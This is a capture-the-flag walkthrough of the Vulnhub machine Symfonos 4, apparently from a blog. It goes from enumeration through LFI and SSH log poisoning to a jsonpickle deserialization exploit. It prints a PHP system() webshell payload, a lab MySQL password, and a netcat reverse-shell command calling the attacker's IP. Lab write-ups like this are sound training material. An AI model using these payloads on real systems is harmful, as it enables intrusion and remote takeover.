- Published on
Vulnhub - Symfonos 4
Today, We are going to pwn Symfonos 4 by Zayotic from Vulnhub
Description:
OSCP-like Intermediate real life based machine designed to teach people the importance of trying harder.
Download Link : https://www.vulnhub.com/entry/symfonos-4,347/
Lets Begin with our Initial Scan
Nmap Scan Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)
| 256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)
|_ 256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:8C:D3:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne
HTTP:
Normal webpage with an image like always. 
Since there is no other interesting Ports Open, I started Gobuster on the webpage.
Gobuster Results:
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.136
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
2020/03/12 19:39:13 Starting gobuster
===============================================================
/index.html (Status: 200)
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/sea.php (Status: 302)
/atlantis.php (Status: 200)
/server-status (Status: 403)
/gods (Status: 301)
===============================================================
2020/03/12 19:41:23 Finished
===============================================================
/gods
Downloaded all log files to my machine.br/ 
hades.log
Hades was the god of the underworld and the name eventually came to also describe the home of the dead as well. He was the oldest male child of Cronus and Rhea. Hades and his brothers Zeus and Poseidon defeated their father and the Titans to end their reign, claiming rulership over the cosmos.
poseidon.log
Poseidon was the god of the sea, earthquakes and horses. Although he was officially one of the supreme gods of Mount Olympus, he spent most of his time in his watery domain. Poseidon was brother to Zeus and Hades. These three gods divided up creation.
zeus.log
Zeus is the god of the sky, lightning and thunder in Ancient Greek religion and myth, and king of the gods on Mount Olympus. Zeus is the sixth child of Kronos and Rhea, king and queen of the Titans.
/atlantis.php
/sea.php
Whenever I open /sea.php it redirects to /atlantis.php. Lets capture the request in burp.
302 Found which is redirection, We can stop a redirection using burp. 
All we need to do is change 302 Found to 200 Ok For that open Proxy -> Options -> Match and Replace.
Now If I visit /sea.php it displays a new page. 
So If I select a GOD the url changes to /sea.php?file=hades maybe Local File Inclusion. 
But I can't view /etc/passwd so I searched for any log files and I got /var/log/auth We dont need to represent .log because we already saw those poseidon.log, zeus.log and hades.log in /gods with extension but in /sea.php it shows the same file even without the extensions.
When seeing those Log files it shows OpenSSH so we can do SSH Log Poisoning
Reference : https://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/
ssh '[?php system($_GET['c']); ?](?php system($_GET['c']); ?)'@192.168.1.136
Now its injected, Time to get reverse shell.
When checking /var/www/html/atlantis.php found mysql credentials.
root : yVzyRGw3cG2Uyt2r
I logged with those and got admin hash.br/ 
MySql Commands: http://g2pc1.bu.edu/~qzpeng/manual/MySQL%20Commands.htm
I tried cracking the hash but I can't. So I skipped that and started looking for other things.
I started looking around in the directories and found /opt/code I found a python code. I came to know its jsonpickle so it may be running on the background. 
Uploaded My Enumeration Script and Found this
- Port 3306 - MySQL
- Port 8080 - Webpage (Maybe)
We can’t see port 8080 directly so We need to do Port Forward by doing this we can access the webpage from our machine.
I used socat method for port forwarding. We can also use SSH interactive shell for port forwarding too. (https://www.cyberciti.biz/faq/linux-unix-tcp-port-forwarding/)
socat TCP-LISTEN:8081,fork TCP:127.0.0.1:8080
Now I can visit http://192.168.1.136:8081, It displays this page
When I click the Main page it directs to
But 192.168.1.136:8081/whoami is suspecious, So I intercept the request in Burp
username looks like base64encoded so I decoded that
So this is the thing we saw in /opt/code
Later I found this article
So I did some changes in the string and encoded this to base64.
{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "os.system"}, {"py/tuple": ["/usr/bin/nc -e /bin/bash 192.168.1.103 1234"]}, null, null, null]}
Gave that base64 encoded to username and started my Listener and got shell.
I'm Root!!
!